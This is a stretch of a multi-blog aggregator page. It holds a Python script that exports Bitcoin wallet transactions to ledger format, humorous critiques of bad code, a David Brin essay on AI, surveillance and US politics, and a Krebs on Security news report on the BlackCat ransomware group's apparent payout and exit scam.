Courtesy of my CRANberries, there is also a diffstat report for this release.

If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianPetter Reinholdtsen: Plain text accounting file from your bitcoin transactions

A while back I wrote a small script to extract the Bitcoin transactions in a wallet in the ledger plain text accounting format. The last few days I spent some time to get it working better with more special cases. In case it can be useful for others, here is a copy:

#!/usr/bin/python3
#  -*- coding: utf-8 -*-
#  Copyright (c) 2023-2024 Petter Reinholdtsen

from decimal import Decimal
import json
import subprocess
import time

import numpy

def format_float(num):
    return numpy.format_float_positional(num, trim='-')

accounts = {
    u'amount' : 'Assets:BTC:main',
}

addresses = {
    '' : 'Assets:bankkonto',
    '' : 'Assets:bankkonto',
}

def exec_json(cmd):
    proc = subprocess.Popen(cmd,stdout=subprocess.PIPE)
    j = json.loads(proc.communicate()[0], parse_float=Decimal)
    return j

def list_txs():
    # get all transactions for all accounts / addresses
    c = 0
    txs = []
    txidfee = {}
    limit=100000
    cmd = ['bitcoin-cli', 'listtransactions', '*', str(limit)]
    if True:
        txs.extend(exec_json(cmd))
    else:
        # Useful for debugging
        with open('transactions.json') as f:
            txs.extend(json.load(f, parse_float=Decimal))
    #print txs
    for tx in sorted(txs, key=lambda a: a['time']):
#        print tx['category']
        if 'abandoned' in tx and tx['abandoned']:
            continue
        if 'confirmations' in tx and 0 >= tx['confirmations']:
            continue
        when = time.strftime('%Y-%m-%d %H:%M', time.localtime(tx['time']))
        if 'message' in tx:
            desc = tx['message']
        elif 'comment' in tx:
            desc = tx['comment']
        elif 'label' in tx:
            desc = tx['label']
        else:
            desc = 'n/a'
        print("%s %s" % (when, desc))
        if 'address' in tx:
            print("  ; to bitcoin address %s" % tx['address'])
        else:
            print("  ; missing address in transaction, txid=%s" % tx['txid'])
        print(f"  ; amount={tx['amount']}")
        if 'fee'in tx:
            print(f"  ; fee={tx['fee']}")
        for f in accounts.keys():
            if f in tx and Decimal(0) != tx[f]:
                amount = tx[f]
                print("  %-20s   %s BTC" % (accounts[f], format_float(amount)))
        if 'fee' in tx and Decimal(0) != tx['fee']:
            # Make sure to list fee used in several transactions only once.
            if 'fee' in tx and tx['txid'] in txidfee \
               and tx['fee'] == txidfee[tx['txid']]:
                True
            else:
                fee = tx['fee']
                print("  %-20s   %s BTC" % (accounts['amount'], format_float(fee)))
                print("  %-20s   %s BTC" % ('Expences:BTC-fee', format_float(-fee)))
                txidfee[tx['txid']] = tx['fee']

        if 'address' in tx and tx['address'] in addresses:
            print("  %s" % addresses[tx['address']])
        else:
            if 'generate' == tx['category']:
                print("  Income:BTC-mining")
            else:
                if amount < Decimal(0):
                    print(f"  Assets:unknown:sent:update-script-addr-{tx['address']}")
                else:
                    print(f"  Assets:unknown:received:update-script-addr-{tx['address']}")

        print()
        c = c + 1
    print("# Found %d transactions" % c)
    if limit == c:
        print(f"# Warning: Limit {limit} reached, consider increasing limit.")

def main():
    list_txs()

main()

It is more of a proof of concept, and I do not expect it to handle all edge cases, but it worked for me, and perhaps you can find it useful too.

To get a more interesting result, it is useful to map accounts sent to or received from to accounting accounts, using the addresses hash. As these will be very context dependent, I leave out my list to allow each user to fill out their own list of accounts. Out of the box, 'ledger reg BTC:main' should be able to show the amount of BTCs present in the wallet at any given time in the past. For other and more valuable analysis, a account plan need to be set up in the addresses hash. Here is an example transaction:

2024-03-07 17:00 Donated to good cause
    Assets:BTC:main                           -0.1 BTC
    Assets:BTC:main                       -0.00001 BTC
    Expences:BTC-fee                       0.00001 BTC
    Expences:donations                         0.1 BTC

It need a running Bitcoin Core daemon running, as it connect to it using bitcoin-cli listtransactions * 100000 to extract the transactions listed in the Wallet.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

Worse Than FailureCodeSOD: A Bit of a Confession

Today, John sends us a confession. This is his code, which was built to handle ISO 8583 messages. As we'll see from some later comments, John knows this is bad.

The ISO 8583 format is used mostly in financial transaction processing, frequently to talk to ATMs, but is likely to show up somewhere in any transaction you do that isn't pure cash.

One of the things the format can support is bitmaps- not the image format, but the "stuff flags into an integer" format. John wrote his own version of this, in C#. It's a long class, so I'm just going to focus on the highlights.

private readonly bool[] bits;

Look, we don't start great. This isn't an absolute mistake, but if you're working on a data structure that is meant to be manipulated via bitwise operations, just lean into it. And yes, if endianness is an issue, you'll need to think a little harder- but you need to think about that anyway. Use clear method names and documentation to make it readable.

In this developer's defense, the bitmap's max size is 128 bits, which doesn't have a native integral type in C#, but a pair of 64-bits would be easier to understand, at least for me. Maybe I've just been infected by low-level programming brainworms. Fine, we're using an array.

Now, one thing that's important, is that we're using this bitmap to represent multiple things.

public bool IsExtendedBitmap
{
	get
	{
		return this.IsFieldSet(1);
	}
}

Note how the 1st bit in this bitmap is the IsExtendedBitmap flag. This controls the length of the total bitmap.

Which, as an aside, they're using IsFieldSet because zero-based indexes are too hard:

public bool IsFieldSet(int field)
{
	return this.bits[field - 1];
}

But things do get worse.

/// <summary>
/// Sets a field
/// </summary>
/// <param name="field">
/// Field to set 
/// </param>
/// <param name="on">
/// Whether or not the field is on 
/// </param>
public void SetField(int field, bool on)
{
	this.bits[field - 1] = on;
	this.bits[0] = false;
	for (var i = 64; i <= 127; i++)
	{
		if (this.bits[i])
		{
			this.bits[0] = true;
			break;
		}
	}
}

I included the comments here because I want to highlight how useless they are. The first line makes sense. Then we set the first bit to false. Which, um, was the IsExtendedBitmap flag. Why? I don't know. Then we iterate across the back half of the bitmap and if there's anything true in there, we set that first bit back to true.

Which, by writing that last paragraph, I've figured out what it's doing: it autodetects whether you're using the higher order bits, and sets the IsExtendedBitmap as appropriate. I'm not sure this is actually correct behavior- what happens if I want to set a higher order bit explicitly to 0?- but I haven't read the spec, so we'll let it slide.

public virtual byte[] ToMsg()
{
	var lengthOfBitmap = this.IsExtendedBitmap ? 16 : 8;
	var data = new byte[lengthOfBitmap];

	for (var i = 0; i < lengthOfBitmap; i++)
	{
		for (var j = 0; j < 8; j++)
		{
			if (this.bits[i * 8 + j])
			{
				data[i] = (byte)(data[i] | (128 / (int)Math.Pow(2, j)));
			}
		}
	}

	if (this.formatter is BinaryFormatter)
	{
		return data;
	}

	IFormatter binaryFormatter = new BinaryFormatter();
	var bitmapString = binaryFormatter.GetString(data);

	return this.formatter.GetBytes(bitmapString);
}

Here's our serialization method. Note how here, the length of the bitmap is either 8 or 16, while previously we were checking all the bits from 64 up to see if it was extended. At first glance, this seemed wrong, but then I realized- data is a byte[]- so 16 bytes is indeed 128 bits.

This gives them the challenging problem of addressing individual bits within this data structure, and they clearly don't know how bitwise operations work, so we get the lovely Math.Pow(2, j) in there.

Ugly, for sure. Unclear, definitely. Which only gets worse when we start unpacking.

public int Unpack(byte[] msg, int offset)
{
	// This is a horribly nasty way of doing the bitmaps, but it works
	// I think...
	var lengthOfBitmap = this.formatter.GetPackedLength(16);
	if (this.formatter is BinaryFormatter)
	{
		if (msg[offset] >= 128)
		{
			lengthOfBitmap += 8;
		}
	}
	else
	{
		if (msg[offset] >= 0x38)
		{
			lengthOfBitmap += 16;
		}
	}

	var bitmapData = new byte[lengthOfBitmap];
	Array.Copy(msg, offset, bitmapData, 0, lengthOfBitmap);

	if (!(this.formatter is BinaryFormatter))
	{
		IFormatter binaryFormatter = new BinaryFormatter();
		var value = this.formatter.GetString(bitmapData);
		bitmapData = binaryFormatter.GetBytes(value);
	}

	// Good luck understanding this.  There be dragons below

	for (var j = 0; j < 8; j++)
	{
		this.bits[i * 8 + j] = (bitmapData[i] & (128 / (int)Math.Pow(2, j))) > 0;
	}

	return offset + lengthOfBitmap;
}

Here, we get our real highlights: the comments. "… but it works… I think…". "Good luck understanding this. There be dragons below."

Now, John wrote this code some time ago. And the thing that I get, when reading this code, is that John was likely somewhat green, and didn't fully understand the problem in front of him or the tools at his disposal to solve it. Further, this was John's independent project, which he was doing to solve a very specific problem- so while the code has problems, I wouldn't heap up too much blame on John for it.

Which, like many other confessional Code Samples-of-the-Day, I'm sharing this because I think it's an interesting learning experience. It's less a "WTF!" and more a, "Oh, man, I see that things went really wrong for you." We all make mistakes, and we all write terrible code from time to time. Credit to John for sharing this mistake.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

365 TomorrowsWall

Author: Jeremy Marks One morning an unfamiliar odor filled the air. Sweet at first, the scent soon reeked of rot. It was not a domestic smell but something wild: a floating carpet of flowers a few kilometers offshore. Townsfolk used spyglasses to study a mysterious group of floaters, a floating carpet of uncountable horned plants. […]

The post Wall appeared first on 365tomorrows.

,

David BrinThe futility of hiding. And then a brief rant!

Just back from an important conference (in Panama) about ways to ensure that the looming tsunami of Artificial Intelligences will become and remain 'beneficial.' Few endeavors could be more important... and as you might guess, I have some concepts on-offer that you'll find nowhere else. Alas, literally  nowhere else. Even though they merely apply only the same tools we used to make an increasingly beneficial society, the last 200 years.

More on that later. Meanwhile... first off, since it's much in the news... want to see what the Apple Vision Pro will turn into within a few years? Watch this video trailer for my novel Existence. predicting where it'll go.

And while we're on prophecies.... This is deeply worrisome... and almost exactly overlaps with my "Probationers" in Sundiver! Back in 1978. Not a joke or a satire.

"Justice Minister Arif Virani has defended a new power in the online harms bill to impose house arrest on someone who is feared to commit a hate crime in the future – even if they have not yet done so already. The person could be made to wear an electronic tag, if the attorney-general requests it, or ordered by a judge to remain at home, the bill says."

But don't worry! The government won't misuse this power! Trust us!


== The Futility of Hiding ==

One purpose for the "Beneficial AGI Conference"  - (and I believe the stream will be up, soon) - was seeking ways to evade the worst and most persistent errors of the past.


Take the classic approach to human civilization - a pyramidal power structure dominated by brutal males, of the kind that ruled 99% of human societies - and many despotisms today. We are all descended from those harems. Onlynow, new tools of techno;logy might empower a return to such pyramidal stupidity, making such abusive power vasty more effective and oppressive than when it was enforced by mere swords.


Such a tech rich extension of despotisd was depicted by George Orwell utilizing total panopticon surveillance for control, of course without any reciprocal sousveillance purview from below. In fact, I doubt George O. ever considered even the possibility. But Orwell's novel would lead to very different outcomes if every member of 'the party' had every moment watched reciprocally by the prols! (The reciprocoal accountability that I prescribed in The Transparent Society.


General transparency might, possibly, prevent the worst aspects of Big Brother. But there are ways that lateral light might also go badly. For example when - as in the PRC - "social credit" system, that is used to let a conformist majority harass and bully dissident minorities or even eccentricity, enforcing homogeneity, as we saw predicted in Ray Bradbury's Fahrenheit 451.


This will be exacerbated by AI, if we aren't careful, since such systems will be able to sieve inputs across the entire internet and all camera systems, as portrayed in "Person of Interest."  While that TV series depicted many worrisome aspects, it also pointed toward the one thing that might offer us a soft landing, as there were two competing AI systems that tended to cancel out each others' worst traits.

I have found it very strange that almost none of the conferences and zoom meetings about AI that I've watched or participated in has ever even mentioned that secret sauce. (Though I do, here in WIRED.)


Instead, there are relentless, hand-wringing discussions about disagreements between "policy wonks' and nerdy tech geeks over how to design regulations to limit bad AI outcomes... and never any allowance for the fact that these changes will happen at an accelerating pace, leaving even our most agile regulators behind, mere ape-humans grasping after answers like a tree sloth. 


Or else... what generally happens at many sincere conferences on "AI ethics," we see a relentless chain of hippie-sounding pleadings and "shoulds," without any clue how to do actually enforce preachy 'ethics' on a new ecosystem where all of the attractor states currently draw towards predation..


In Foundation's Triumph I explored the implications of embedded "deep-ethical-programming" regulations - including Isaac Asimov's "three laws of robotics," revealing the inevitable result. Even if you succeed in emplanting truly genetic-level codes of behavior, the result will be that super-uber intelligent systems will simply become... lawyers, and find ways around every limitation. Unless...


...unless they are caught and constrained by other lawyers who are able to keep up. This is exactly the technique that allowed us to limit the power of elites, to end 6000 years of feudalism and launch upon our 240 year Periclean enlightenment experiment... by flattening power structures and forcing elite entities to compete with one another.


It is only the exact method prescribed by Adam Smith, by the US framers and by every generation of reformers since. And it is utterly ignored in every single AI/internet discussion or conference I have ever watched or attended.


If AI are destined to outpace us, then one potential solution is to flatten the playing field and get distinctly different AIs competing with each other, especially tattling on flaws and/or predations or malevolent or even unpleasant behaviors.


It is exactly what we have done for 250 years... and it is the one approach that is never, ever, and I mean ever discussed. Almost as if there is a mental block against admitting or even noticing the obvious.



== Don’t try to hide!”

Your DNA can be pulled from thin air: Reinforcing a point I’ve been pushing since the 1990s, in The Transparent Society and elsewhere, that hiding is not the way to preserve privacy, there are the shrill cries that new generative AI systems may decipher and interpret our personal DNA! Only – as illustrated in the film Gattaca – that DNA is already everywhere. You shed it in flakes of skin wherever you go. There is a better way to prevent your data being used against you. By aggressively ripping the veils away from malefactors who might do that sort of thing! 


And by this point, the only folks reading any longer are likely AIs... So, time to get self-indulgent with a temper tantrum!



== And now... that rant I promised! ==


I sometimes store things for posting and lose the link. But here's a quotation worth answering:

"Alas, we have TWO wars against the Enlightenment raging, one from the reactionary right and the other from the postmodern faux marxist wannabe totalitarian Red Guards on the left."

Bah! One of these lethal threats is real, but not because of MAGA. Those tens of millions of confederate ground troops are -- like numbskulls in all the previous 7 phases of our recurring US Civil War -- merely riled-up mobs, responding to dog whistles and hatred of minorities and nerds.  They are brownshirt tools of the real owners of today's GOP ... a few thousand oligarchs who are now desperately afraid. 

What do theose masters -- here and abroad -- fear most? You can see it in the only priorities pushed by their servants in Congress:

They dread full-funding of the IRS. And a return to effective rooseveltean social contracts, replacing the great Supply Side ripoff-scam. They fear a return to what works, what created the post WWII middle class. What could block feudalism's long planned return.  And let's be clear, when Republicans control a chamber of the US Congress, preserving Supply Side and eviscerating the IRS are their ONLY legislative priorities. All the rest is fervid, potemkin preening.

Who are they? An alliance of petro princes, casino mafiosi, "ex" Kremlin commissars, supposed marxist mandarins, hedge lords, inheritance brats... Trace it... sharing one goal. One common foe. The worldwide caste of skilled, middle class knowledge professionals. 

They are ALL waging all-out war vs ALL fact using professions, from science and teaching, medicine and law and civil service to the heroes of the FBI/Intel/Military officer corps who won the Cold War and the War on terror. 


== BOTH sides do it? ==

But the left?  The LEFT is just as bad?  
The what? 
Where in God's name does this shill get this crap about "postmodern faux marxist wannabe totalitarian Red Guards on the left." ???

Yes. Yes, today's FAR left CONTAINS some fact-allergic, troglodyte-screeching dogmatists who wage war on science and hate the American tradition of steady, pragmatic reform, and who would impose their prescribed morality on you.   

But today’s mad ENTIRE right CONSISTS of fact-allergic, troglodyte-screeching dogmatists who wage war on science and hate the American tradition of steady, pragmatic reform, and who would impose their prescribed morality on you.     

There is all the world’s difference between FAR and ENTIRE.  As there is between CONTAINS and CONSISTS.  One lunatic mob owns and operates an entire US political party, waging open war against minorities, races, genders, even the concept of equal protection under the law. But above all (as I said) pouring hate upon the nerdy fact professionals who stand in their way, blocking their path back to feudal power. 

The other pack of dopes? A few thousand jibbering campus twerps? San Fran zippies? Yowlers who are largely ignored by the one party of pragmatic problem solvers that remains in U.S. political life.

Sure, Foxites howl about 'woke'. But ask any of them... even the worst campus PC bullies (and though shrill, they are deemed jokes, even on campus). Ask them about Marx!  You'll find that the indignant ignoramuses could not paraphrase even the simplest cliché about old Karl. Their ignorance is almost as profound as their utter ineptitude and irrelevance. Except as excuses for tirades on Fox, they are of no relevance at all.

What is relevant is NERDS!  All nerds stand in the way of re-imposed feudalism. The folks who keep civilization going. The ones who know cyber, bio, nuclear, chem and every other dual use power-tech. And that is why Fox each day rails against them, far more often than any race or gender!

Want a pattern? Again, let me reiterate. Ask your MAGAs or right-elite friends to explain that cult's all-out war vs ALL fact using professions, from science and teaching, medicine and law and civil service to the heroes of the FBI/Intel/Military officer corps who won the Cold War and the War on terror. 

Cryptogram Friday Squid Blogging: New Plant Looks Like a Squid

Newly discovered plant looks like a squid. And it’s super weird:

The plant, which grows to 3 centimetres tall and 2 centimetres wide, emerges to the surface for as little as a week each year. It belongs to a group of plants known as fairy lanterns and has been given the scientific name Relictithismia kimotsukiensis.

Unlike most other plants, fairy lanterns don’t produce the green pigment chlorophyll, which is necessary for photosynthesis. Instead, they get their energy from fungi.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Worse Than FailureRepresentative Line: A String of Null Thinking

Today's submitter identifies themselves as pleaseKillMe, which hey, c'mon buddy. Things aren't that bad. Besides, you shouldn't let the bad code you inherit drive you to depression- it should drive you to revenge.

Today's simple representative line is one that we share because it's not just representative of our submitter's code base, but one that shows up surprisingly often.

SELECT * FROM users WHERE last_name='NULL'

Now, I don't think this particular code impacted Mr. Null, but it certainly could have. That's just a special case of names being hard.

In this application, last_name is a nullable field. They could just store a NULL, but due to data sanitization issues, they stored 'NULL' instead- a string. NULL is not 'NULL', and thus- we've got a lot of 'NULL's that may have been intended to be NULL, but also could be somebody's last name. At this point, we have no way to know.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

365 TomorrowsOne More Story

Author: J.D. Rice “I remember them.” My hand moves the candle with perfect precision, carefully transferring the exothermic reaction from its wick to that of the taller candle in front of me. The combustion thus spread, I place the first candle back in its holder. The first time I copied this technique, my human master […]

The post One More Story appeared first on 365tomorrows.

Krebs on SecurityBlackCat Ransomware Group Implodes After Apparent $22M Payment by Change Healthcare

There are indications that U.S. healthcare giant Change Healthcare has made a $22 million extortion payment to the infamous BlackCat ransomware group (a.k.a. “ALPHV“) as the company struggles to bring services back online amid a cyberattack that has disrupted prescription drug services nationwide for weeks. However, the cybercriminal who claims to have given BlackCat access to Change’s network says the crime gang cheated them out of their share of the ransom, and that they still have the sensitive data Change reportedly paid the group to destroy. Meanwhile, the affiliate’s disclosure appears to have prompted BlackCat to cease operations entirely.

Image: Varonis.

In the third week of February, a cyber intrusion at Change Healthcare began shutting down important healthcare services as company systems were taken offline. It soon emerged that BlackCat was behind the attack, which has disrupted the delivery of prescription drugs for hospitals and pharmacies nationwide for nearly two weeks.

On March 1, a cryptocurrency address that security researchers had already mapped to BlackCat received a single transaction worth approximately $22 million. On March 3, a BlackCat affiliate posted a complaint to the exclusive Russian-language ransomware forum Ramp saying that Change Healthcare had paid a $22 million ransom for a decryption key, and to prevent four terabytes of stolen data from being published online.

The affiliate claimed BlackCat/ALPHV took the $22 million payment but never paid him his percentage of the ransom. BlackCat is known as a “ransomware-as-service” collective, meaning they rely on freelancers or affiliates to infect new networks with their ransomware. And those affiliates in turn earn commissions ranging from 60 to 90 percent of any ransom amount paid.

“But after receiving the payment ALPHV team decide to suspend our account and keep lying and delaying when we contacted ALPHV admin,” the affiliate “Notchy” wrote. “Sadly for Change Healthcare, their data [is] still with us.”

Change Healthcare has neither confirmed nor denied paying, and has responded to multiple media outlets with a similar non-denial statement — that the company is focused on its investigation and on restoring services.

Assuming Change Healthcare did pay to keep their data from being published, that strategy seems to have gone awry: Notchy said the list of affected Change Healthcare partners they’d stolen sensitive data from included Medicare and a host of other major insurance and pharmacy networks.

On the bright side, Notchy’s complaint seems to have been the final nail in the coffin for the BlackCat ransomware group, which was infiltrated by the FBI and foreign law enforcement partners in late December 2023. As part of that action, the government seized the BlackCat website and released a decryption tool to help victims recover their systems.

BlackCat responded by re-forming, and increasing affiliate commissions to as much as 90 percent. The ransomware group also declared it was formally removing any restrictions or discouragement against targeting hospitals and healthcare providers.

However, instead of responding that they would compensate and placate Notchy, a representative for BlackCat said today the group was shutting down and that it had already found a buyer for its ransomware source code.

The seizure notice now displayed on the BlackCat darknet website.

“There’s no sense in making excuses,” wrote the RAMP member “Ransom.” “Yes, we knew about the problem, and we were trying to solve it. We told the affiliate to wait. We could send you our private chat logs where we are shocked by everything that’s happening and are trying to solve the issue with the transactions by using a higher fee, but there’s no sense in doing that because we decided to fully close the project. We can officially state that we got screwed by the feds.”

BlackCat’s website now features a seizure notice from the FBI, but several researchers noted that this image seems to have been merely cut and pasted from the notice the FBI left in its December raid of BlackCat’s network. The FBI has not responded to requests for comment.

Fabian Wosar, head of ransomware research at the security firm Emsisoft, said it appears BlackCat leaders are trying to pull an “exit scam” on affiliates by withholding many ransomware payment commissions at once and shutting down the service.

“ALPHV/BlackCat did not get seized,” Wosar wrote on Twitter/X today. “They are exit scamming their affiliates. It is blatantly obvious when you check the source code of their new takedown notice.”

Dmitry Smilyanets, a researcher for the security firm Recorded Future, said BlackCat’s exit scam was especially dangerous because the affiliate still has all the stolen data, and could still demand additional payment or leak the information on his own.

“The affiliates still have this data, and they’re mad they didn’t receive this money, Smilyanets told Wired.com. “It’s a good lesson for everyone. You cannot trust criminals; their word is worth nothing.”

BlackCat’s apparent demise comes closely on the heels of the implosion of another major ransomware group — LockBit, a ransomware gang estimated to have extorted over $120 million in payments from more than 2,000 victims worldwide. On Feb. 20, LockBit’s website was seized by the FBI and the U.K.’s National Crime Agency (NCA) following a months-long infiltration of the group.

LockBit also tried to restore its reputation on the cybercrime forums by resurrecting itself at a new darknet website, and by threatening to release data from a number of major companies that were hacked by the group in the weeks and days prior to the FBI takedown.

But LockBit appears to have since lost any credibility the group may have once had. After a much-promoted attack on the government of Fulton County, Ga., for example, LockBit threatened to release Fulton County’s data unless paid a ransom by Feb. 29. But when Feb. 29 rolled around, LockBit simply deleted the entry for Fulton County from its site, along with those of several financial organizations that had previously been extorted by the group.

Fulton County held a press conference to say that it had not paid a ransom to LockBit, nor had anyone done so on their behalf, and that they were just as mystified as everyone else as to why LockBit never followed through on its threat to publish the county’s data. Experts told KrebsOnSecurity LockBit likely balked because it was bluffing, and that the FBI likely relieved them of that data in their raid.

Smilyanets’ comments are driven home in revelations first published last month by Recorded Future, which quoted an NCA official as saying LockBit never deleted the data after being paid a ransom, even though that is the only reason many of its victims paid.

“If we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future,” LockBit’s extortion notes typically read.

Hopefully, more companies are starting to get the memo that paying cybercrooks to delete stolen data is a losing proposition all around.

,

Cory DoctorowCatch me at San Francisco Public Library on Mar 13, discussing my new novel “The Bezzle” with Robin Sloan!

A pair of black and white photos of me and Robin Sloan, with the cover of my novel 'The Bezzle' between us. It's captioned 'Author: Cory Doctorow, The Bezzle, in conversation with Robin Sloan.'

At long last, the San Francisco stop of the book tour for my new novel The Bezzle has been finalized: I’ll be at the San Francisco Public Library Main Branch on Wednesday, March 13th, in conversation with Robin Sloan!

The event starts at 6PM with Cooper Quintin from the Electronic Frontier Foundation, talking about the real horrors of the prison-tech industry, which I fictionalize in The Bezzle.

Attentive readers will know that this event was finalized very late in the day, and it’s going to need a little help, given the short timeline. Please consider coming – and be sure to tell your Bay Area friends about the gig!

Wednesday, 3/13/2024
6:00 – 7:30
Koret Auditorium
Main Library
100 Larkin Street
San Francisco, CA 94102

Worse Than FailureCodeSOD: Moving in a Flash

It's a nearly universal experience that the era of our youth and early adulthood is where we latch on to for nostalgia. In our 40s, the music we listened to in our 20s is the high point of culture. The movies we watched represent when cinema was good, and everything today sucks.

And, based on the sheer passage of calendar time, we have a generation of adults whose nostalgia has latched onto Flash. I've seen many a thinkpiece lately, waxing rhapsodic about the Flash era of the web. I'd hesitate to project a broad cultural trend from that, but we're roughly about the right time in the technology cycle that I'd expect people to start getting real nostalgic for Flash. And I'll be honest: Flash enabled some interesting projects.

Of course, Flash also gave us Flex, and I'm one of the few people old enough to remember when Oracle tried to put their documentation into a Flex based site from which you could not copy and paste. That only lasted a few months, thankfully, but as someone who was heavily in the Oracle ecosystem at the time, it was a terrible few months.

In any case, long ago, CW inherited a Flash-based application. Now, Flash, like every UI technology, has a concept of "containers"- if you put a bunch of UI widgets inside a container, their positions (default) to being relative to the container. Move the container, and all the contents move too. I think we all find this behavior pretty obvious.

CW's co-worker did not. Here's how they handled moving a bunch of related objects around:

public function updateKeysPosition(e:MouseEvent):void{
			if(dragging==1){
			theTextField.x=catButtonArray[0].x-100;
			theTextField.y=catButtonArray[0].y-200;
			catButtonArray[1].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10;
			catButtonArray[1].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			
			catButtonArray[2].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth;
			catButtonArray[2].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[3].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*2;
			catButtonArray[3].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[4].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*3;
			catButtonArray[4].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[5].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*4;
			catButtonArray[5].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[6].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*5;
			catButtonArray[6].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[7].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*6;
			catButtonArray[7].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[8].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*7;
			catButtonArray[8].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[9].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*8;
			catButtonArray[9].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[10].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*9;
			catButtonArray[10].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			
			catButtonArray[11].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30;
			catButtonArray[11].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[12].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth;
			catButtonArray[12].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[13].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*2;
			catButtonArray[13].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[14].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*3;
			catButtonArray[14].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[15].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*4;
			catButtonArray[15].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[16].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*5;
			catButtonArray[16].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[17].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*6;
			catButtonArray[17].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[18].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*7;
			catButtonArray[18].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[19].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*8;
			catButtonArray[19].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			
			catButtonArray[20].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60;
			catButtonArray[20].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[21].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth;
			catButtonArray[21].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[22].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth*2;
			catButtonArray[22].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[23].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth*3;
			catButtonArray[23].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[24].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth*4;
			catButtonArray[24].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[25].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth*5;
			catButtonArray[25].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[26].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth*6;
			catButtonArray[26].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			//SPACE
			catButtonArray[27].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+228;
			catButtonArray[27].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+240;
			//RETURN
			catButtonArray[28].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+558;
			catButtonArray[28].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+207;
			
			
			
			}
		}
[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

365 TomorrowsMandelbrot’s Monster

